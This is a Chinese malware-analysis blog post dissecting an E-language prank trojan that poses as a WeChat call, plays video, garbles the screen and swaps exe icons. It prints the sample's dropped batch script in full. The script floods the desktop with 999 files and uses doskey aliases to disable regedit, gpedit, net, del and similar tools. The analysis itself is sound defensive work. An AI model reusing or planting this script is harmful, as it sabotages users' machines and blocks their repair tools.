一款专门针对高质量女性的易语言钓鱼样本简单分析
<p data-track="1" data-pm-slice="0 0 []"> </p><p class="pgc-p" data-track="1" data-pm-slice="1 1 []"><strong>本文为合天网安实验室原创文章,转载请注明出处!</strong></p>
<p data-track="1" data-pm-slice="0 0 []"> </p>
<p data-track="1" data-pm-slice="0 0 []"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">由于一直没怎么分析过易语言的样本,想学习一下易语言的样本分析过程,正好最近碰见了一个易语言编写的样本,是一个专门针对人类高质量女性进行钓鱼的样本,正好拿来学习学习,笔者是一边学习一边分析,如有不对之处还望各位批评指正。</span></p>
<p data-track="2"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">该样本图标如下:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=YTliMjQyZTgxN2QzNDk1MDIwMzE5YzQ1YjE5NGU3NzcsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="4"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">好像和前段时间流行的某人类高质量男性留着一样的发型?查看详细信息发现文件说明处还专门指出“高质量女性请运行”:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=OTkwM2Q2Y2M3OWI1YzM1OTFlMjQ2NTI1YjY0ODE5MmQsMTYzMjg4MzM1ODc4Mw=="></div>
<h1 class="pgc-h-arrow-right" data-track="6">易语言的特点</h1>
<p data-track="7"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">要分析清楚易语言,首先得大概了解一下易语言程序怎么开发,怎么编译,易语言是一款中文编程语言,它通过封装一些支持库来拓展自身的功能。如下是一个demo:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NDQ3ZDk0ODZlMjhlMTAyYTBkODkxMWE1NjllM2NiOTAsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="9"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">易语言有两种主要的编译方式:</span></p>
<p data-track="10"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">独立编译:是指易语言编译时,程序和易语言的支持库打包在一个exe文件中。程序可以脱离易语言环境使用。</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MGUwNmRiNTFlMTAyZDA5MDNjYjFmNTkzMjgyM2NmNjIsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="12"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">非独立编译:是指易语言编译时,单独编译exe文件,这样生成的文件体积小。必须带上支持库才能使用程序。</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MGU5YWUyNThmMDI1MTIwNzQ3YTQyZGQ2ZTJjZWFiYjksMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="14"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">如果依赖库不存在将会弹出报错窗口:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NzJlZWUyN2Y0YjVhMzdmNzczZDlkYWQ2MWQ2OTliYjEsMTYzMjg4MzM1ODc4Mw=="></div>
<h1 class="pgc-h-arrow-right" data-track="16">样本静态分析</h1>
<p data-track="17"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">那么有了上述知识,我们就可以判断这个样本是哪种编译方式了,拖入Ida首先发现样本会在Temp临时目录创建以E_N开头的文件夹,并释放一些后缀名为.fnr和.fne的PE文件。</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=YWMyN2E1YmNjYTYzY2Q2OTkzNzJkNjBlMjE4MmE4YzEsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=YjhkOTU1NDNmNmIyOWQyYjZjZDE5MDE5YTBiZGI3N2YsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="19"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">调用LoadLibrary和GetProcessAddress函数,加载支持库文件,获取GetNewSock的函数地址:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ODJiNjlkOTNhNmI2ZTBhNjZiMmRjNjU3NGQ4YjIwNTgsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="21"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">然后发现后面会调用call eax和MessageBox:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=M2JhZjM5MWUzOTAwYzJmN2NiNTYzNTE4N2UyODI4MzEsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="23"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">这些都是易语言加载支持库的一些特征,该样本使用的是独立编译,接下来我们直接进行动态分析。</span></p>
<h1 class="pgc-h-arrow-right" data-track="25">样本动态分析</h1>
<p data-track="26"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">我们使用火绒剑结合OD进行动态调试分析,对一些关键的API下断点,如CreateFileA,MessageBoxA,CreateProcessA,CreateWindowExA等,于是我们就可以发现除了krnln.fnr还释放了其他的支持库文件:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MjQ3NzlmNTdiMjk5NmIxMDEzMWI2NjMyN2JlZDdiYWUsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NjczZDMxODI1NDJkMWRlYzVlMDlkMWMwMDUzYzNkZmQsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="29"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">其中eAPI.fne是应用接口支持库,iext.fne是拓展界面支持库,krnln.fnr是系统核心支持库,shell.fne是操作系统界面功能支持库,spec.fne是特殊功能支持库,mp3.run、com.run、wmp.dll对应的是Windows媒体播放器支持库。看来这个样本可能会播放音频或者视频。继续运行发现:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MzhjOGU4ZjcwMDk5Mjk1NDkyNWQ4YzJlODcxM2Y4OWIsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZDgzZjQ5ODZhMzkzNGMyNmUyYTc2NGJjY2EyMDUwZTksMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZGJhMTA2NzI2MmRkMTI5NzQ5MmQ4YjhiZWE2YzJlMjUsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="33"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">同时还释放并运行一个bat文件:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NmFhNTM4MDc0Yzg0YjIxZDY5MjI2YTJhNGZlY2RhYTYsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MDljZmIxMTIwYmJiYWJiMTdmMzMzNzZkZmZjNGRlNmUsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="36"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">dc.bat内容为:</span></p>
<div class="cnblogs_code">
<pre><span style="color: rgba(0, 0, 0, 1)">@echo off
cd c:\users\</span>%username%<span style="color: rgba(0, 0, 0, 1)">\desktop\
</span><span style="color: rgba(0, 0, 255, 1)">for</span> /L %%X IN (<span style="color: rgba(128, 0, 128, 1)">1</span>,<span style="color: rgba(128, 0, 128, 1)">1</span>,<span style="color: rgba(128, 0, 128, 1)">999</span>) DO type nul>人类高质量男性%%<span style="color: rgba(0, 0, 0, 1)">X.txt
doskey regedit</span>=<span style="color: rgba(0, 0, 0, 1)">regedit.
doskey gpedit.msc</span>=<span style="color: rgba(0, 0, 0, 1)"> gpedit.Msc.
doskey gpedit</span>=<span style="color: rgba(0, 0, 0, 1)"> gpedit.Msc.
doskey net</span>=<span style="color: rgba(0, 0, 0, 1)">net.
doskey mmc </span>=<span style="color: rgba(0, 0, 0, 1)"> mmc.
doskey mmc.exe </span>=<span style="color: rgba(0, 0, 0, 1)"> mmc.
doskey assoc</span>=<span style="color: rgba(0, 0, 0, 1)">assoc.
doskey ftype</span>=<span style="color: rgba(0, 0, 0, 1)">ftype.
doskey del </span>=<span style="color: rgba(0, 0, 0, 1)"> del.
doskey delete </span>=<span style="color: rgba(0, 0, 0, 1)"> del.
doskey RD </span>= rd.</pre>
</div>
<p> </p>
<p data-track="39"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">运行后桌面会出现999个txt文件:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZDU0ZWYyN2NjNTQ1ZThkNjljOGVkYzVhYmI3OGQyYTYsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="41"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">同时,temp目录下还释放了如下文件:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NjMyYmE5MjBhOTgzY2VkMmVkYWYzZDJhZmQ3ODVmMjQsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=Mjg3OTg0MmViM2Y1N2I1M2ZlOThmYTU0NDc5MzI0ZDYsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZTZjYjVjNTA4Yjk5NzU2NWQ3NWM2MWE3ZGJmN2ViYmYsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="45"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">然后出现如下类似微信电话的窗口:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MDc1ZWU5NjZiMDUxYjljMzNjNjhhZjk2NmQ5NGM3ODgsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="47"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">当点击接听的时候便会播放音频和视频:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MTE2NzE0ZjFmMzUxNGExZWNhNTgyNzk5MjRmN2U5OGIsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="49"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">对于窗口所触发的行为我们可以使用OD的窗口界面:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MmFhNDk4Y2VhNDEyZTA3OWYzNjk2NTkyYWFkNTA1ODEsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="51"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">在按钮处设置消息断点,当发生对应的事件时即可断在消息处理函数处。</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=OGIzMmFkZWJjNDAwOTFlOGMzODkwNGM1OWQxNDI2NTYsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MjYxN2Q3N2MxMzc3NTViNzgxMGViZDNkNzdmZGFhNDcsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MjgxZmJiYmIzYjQ0MTAzNWYzOWQyZGQ4OTAyNGZhOTAsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MDhlNmY4ZGJlMzJjNGY0NWZjMTY3NWYxNGUzN2RkYmIsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="55"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">然后便退出了。</span></p>
<p data-track="56"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">其中当点击拒接微信电话时,便会出现恶搞现象,电脑屏幕出现“分块”现象,同时播放wallpaper.mp4:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NzkxNDg0YzgyYWJiNDFlYTYxOTMxNGZkMjBhN2I0MjAsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MGFhNTJkNzBmNTk1NjFhNzcyYTc4ZDBiMTA0OTM1NjEsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="60"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">还会像熊猫烧香一样将所有的exe文件图标全部修改:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZWJhMWZkZjYwOTU1MzE0MjY2YTI3NjM2Njg2NDhmNzYsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="62">这些功能主要是由释放出的FZ%.exe实现的,感兴趣的可以找我索要样本,继续分析一下,但一定要在虚拟机下运行,提前做好快照备份。</p>
<p> </p><br><br>
来源:https://www.cnblogs.com/hetianlab/p/15351861.html
頁:
[1]